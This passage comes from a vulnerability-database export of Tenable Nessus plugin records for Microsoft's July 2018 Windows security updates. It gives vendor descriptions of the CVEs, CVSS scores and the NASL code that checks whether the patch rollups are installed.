Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2018-8284)\n\n - An elevation of privilege vulnerability exists when\n Windows fails a check, allowing a sandbox escape. An\n attacker who successfully exploited the vulnerability\n could use the sandbox escape to elevate privileges on an\n affected system. This vulnerability by itself does not\n allow arbitrary code execution. However, the\n vulnerability could allow arbitrary code to run if an\n attacker uses it in combination with another\n vulnerability, such as a remote code execution\n vulnerability or another elevation of privilege\n vulnerability, that can leverage the elevated privileges\n when code execution is attempted. The security update\n addresses the vulnerability by correcting how Windows\n file picker handles paths. (CVE-2018-8314)\n\n - A security feature bypass vulnerability exists when\n Microsoft .NET Framework components do not correctly\n validate certificates. An attacker could present expired\n certificates when challenged. The security update\n addresses the vulnerability by ensuring that .NET\n Framework components correctly validate certificates.\n (CVE-2018-8356)\");\n # https://support.microsoft.com/en-us/help/4338815/windows-81-update-kb4338815\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e0106ae8\");\n # https://support.microsoft.com/en-us/help/4338824/windows-81-update-kb4338824\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?be1b803d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4338824 or Cumulative Update KB4338815.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8284\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-07\";\nkbs = make_list('4338815', '4338824');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"07_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4338815, 4338824])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-01T01:43:08", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4338814.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2018-8202)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\n\n - A denial of service vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could cause a\n system to stop responding. Note that the denial of\n service condition would not allow an attacker to execute\n code or to elevate user privileges. However, the denial\n of service condition could prevent authorized users from\n using system resources. (CVE-2018-8304)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8309)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8280, CVE-2018-8290)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8282)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8125,\n CVE-2018-8275)\n\n - A denial of service vulnerability exists when Windows\n improperly handles File Transfer Protocol (FTP)\n connections. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2018-8206)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8222)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2018-8308)\n\n - A security feature bypass vulnerability exists when\n Microsoft WordPad improperly handles embedded OLE\n objects. An attacker who successfully exploited the\n vulnerability could bypass content blocking. In a file-\n sharing attack scenario, an attacker could provide a\n specially crafted document file designed to exploit the\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerability by correcting how Microsoft WordPad\n handles input. (CVE-2018-8307)\n\n - A Remote Code Execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8260)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-8313)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2018-8284)\n\n - A security feature bypass vulnerability exists when\n Microsoft .NET Framework components do not correctly\n validate certificates. An attacker could present expired\n certificates when challenged. The security update\n addresses the vulnerability by ensuring that .NET\n Framework components correctly validate certificates.\n (CVE-2018-8356)", "modified": "2020-01-02T00:00:00", "id": "SMB_NT_MS18_JUL_4338814.NASL", "href": "https://www.tenable.com/plugins/nessus/110980", "published": "2018-07-10T00:00:00", "title": "KB4338814: Windows 10 Version 1607 and Windows Server 2016 July 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110980);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\n \"CVE-2018-0949\",\n \"CVE-2018-8125\",\n \"CVE-2018-8202\",\n \"CVE-2018-8206\",\n \"CVE-2018-8222\",\n \"CVE-2018-8242\",\n \"CVE-2018-8260\",\n \"CVE-2018-8275\",\n \"CVE-2018-8280\",\n \"CVE-2018-8282\",\n \"CVE-2018-8284\",\n \"CVE-2018-8287\",\n \"CVE-2018-8288\",\n \"CVE-2018-8290\",\n \"CVE-2018-8291\",\n \"CVE-2018-8296\",\n \"CVE-2018-8304\",\n \"CVE-2018-8307\",\n \"CVE-2018-8308\",\n \"CVE-2018-8309\",\n \"CVE-2018-8313\",\n \"CVE-2018-8356\"\n );\n script_bugtraq_id(\n 104617,\n 104620,\n 104622,\n 104623,\n 104629,\n 104631,\n 104632,\n 104634,\n 104635,\n 104636,\n 104637,\n 104638,\n 104642,\n 104644,\n 104648,\n 104664,\n 104665,\n 104666,\n 104667,\n 104668,\n 104669,\n 104670\n );\n script_xref(name:\"MSKB\", value:\"4338814\");\n script_xref(name:\"MSFT\", value:\"MS18-4338814\");\n\n script_name(english:\"KB4338814: Windows 10 Version 1607 and Windows Server 2016 July 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4338814.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2018-8202)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\n\n - A denial of service vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could cause a\n system to stop responding. Note that the denial of\n service condition would not allow an attacker to execute\n code or to elevate user privileges. However, the denial\n of service condition could prevent authorized users from\n using system resources. (CVE-2018-8304)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8309)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8280, CVE-2018-8290)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8282)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8125,\n CVE-2018-8275)\n\n - A denial of service vulnerability exists when Windows\n improperly handles File Transfer Protocol (FTP)\n connections. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2018-8206)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8222)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2018-8308)\n\n - A security feature bypass vulnerability exists when\n Microsoft WordPad improperly handles embedded OLE\n objects. An attacker who successfully exploited the\n vulnerability could bypass content blocking. In a file-\n sharing attack scenario, an attacker could provide a\n specially crafted document file designed to exploit the\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerability by correcting how Microsoft WordPad\n handles input. (CVE-2018-8307)\n\n - A Remote Code Execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8260)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-8313)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2018-8284)\n\n - A security feature bypass vulnerability exists when\n Microsoft .NET Framework components do not correctly\n validate certificates. An attacker could present expired\n certificates when challenged. The security update\n addresses the vulnerability by ensuring that .NET\n Framework components correctly validate certificates.\n (CVE-2018-8356)\");\n # https://support.microsoft.com/en-us/help/4338814/windows-10-update-kb4338814\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6a189799\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4338814.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8284\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-07\";\nkbs = make_list('4338814');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"07_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4338814])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-01T01:43:09", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4338826.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2018-8202)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8125,\n CVE-2018-8274, CVE-2018-8275, CVE-2018-8279)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\n\n - A denial of service vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could cause a\n system to stop responding. Note that the denial of\n service condition would not allow an attacker to execute\n code or to elevate user privileges. However, the denial\n of service condition could prevent authorized users from\n using system resources. (CVE-2018-8304)\n\n - A Remote Code Execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8260)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8309)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8282)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8222)\n\n - A denial of service vulnerability exists when Windows\n improperly handles File Transfer Protocol (FTP)\n connections. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2018-8206)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8324)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2018-8308)\n\n - A security feature bypass vulnerability exists when\n Microsoft WordPad improperly handles embedded OLE\n objects. An attacker who successfully exploited the\n vulnerability could bypass content blocking. In a file-\n sharing attack scenario, an attacker could provide a\n specially crafted document file designed to exploit the\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerability by correcting how Microsoft WordPad\n handles input. (CVE-2018-8307)\n\n - A security feature bypass vulnerability exists in the\n Microsoft Chakra scripting engine that allows Control\n Flow Guard (CFG) to be bypassed. By itself, the CFG\n bypass vulnerability does not allow arbitrary code\n execution. However, an attacker could use the CFG bypass\n vulnerability in conjunction with another vulnerability,\n such as a remote code execution vulnerability, to run\n arbitrary code on a target system. (CVE-2018-8276)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-8313)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2018-8284)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8280, CVE-2018-8286,\n CVE-2018-8290)\n\n - A security feature bypass vulnerability exists when\n Microsoft .NET Framework components do not correctly\n validate certificates. An attacker could present expired\n certificates when challenged. The security update\n addresses the vulnerability by ensuring that .NET\n Framework components correctly validate certificates.\n (CVE-2018-8356)", "modified": "2020-01-02T00:00:00", "id": "SMB_NT_MS18_JUL_4338826.NASL", "href": "https://www.tenable.com/plugins/nessus/110985", "published": "2018-07-10T00:00:00", "title": "KB4338826: Windows 10 Version 1703 July 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110985);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\n \"CVE-2018-0949\",\n \"CVE-2018-8125\",\n \"CVE-2018-8202\",\n \"CVE-2018-8206\",\n \"CVE-2018-8222\",\n \"CVE-2018-8242\",\n \"CVE-2018-8260\",\n \"CVE-2018-8274\",\n \"CVE-2018-8275\",\n \"CVE-2018-8276\",\n \"CVE-2018-8279\",\n \"CVE-2018-8280\",\n \"CVE-2018-8282\",\n \"CVE-2018-8284\",\n \"CVE-2018-8286\",\n \"CVE-2018-8287\",\n \"CVE-2018-8288\",\n \"CVE-2018-8290\",\n \"CVE-2018-8291\",\n \"CVE-2018-8296\",\n \"CVE-2018-8304\",\n \"CVE-2018-8307\",\n \"CVE-2018-8308\",\n \"CVE-2018-8309\",\n \"CVE-2018-8313\",\n \"CVE-2018-8324\",\n \"CVE-2018-8356\"\n );\n script_bugtraq_id(\n 104617,\n 104620,\n 104622,\n 104623,\n 104626,\n 104629,\n 104631,\n 104632,\n 104634,\n 104635,\n 104636,\n 104637,\n 104638,\n 104641,\n 104642,\n 104643,\n 104644,\n 104648,\n 104650,\n 104653,\n 104664,\n 104665,\n 104666,\n 104667,\n 104668,\n 104669,\n 104670\n );\n script_xref(name:\"MSKB\", value:\"4338826\");\n script_xref(name:\"MSFT\", value:\"MS18-4338826\");\n\n script_name(english:\"KB4338826: Windows 10 Version 1703 July 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4338826.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2018-8202)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8125,\n CVE-2018-8274, CVE-2018-8275, CVE-2018-8279)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\n\n - A denial of service vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could cause a\n system to stop responding. Note that the denial of\n service condition would not allow an attacker to execute\n code or to elevate user privileges. However, the denial\n of service condition could prevent authorized users from\n using system resources. (CVE-2018-8304)\n\n - A Remote Code Execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8260)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8309)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8282)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8222)\n\n - A denial of service vulnerability exists when Windows\n improperly handles File Transfer Protocol (FTP)\n connections. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2018-8206)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8324)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2018-8308)\n\n - A security feature bypass vulnerability exists when\n Microsoft WordPad improperly handles embedded OLE\n objects. An attacker who successfully exploited the\n vulnerability could bypass content blocking. In a file-\n sharing attack scenario, an attacker could provide a\n specially crafted document file designed to exploit the\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerability by correcting how Microsoft WordPad\n handles input. (CVE-2018-8307)\n\n - A security feature bypass vulnerability exists in the\n Microsoft Chakra scripting engine that allows Control\n Flow Guard (CFG) to be bypassed. By itself, the CFG\n bypass 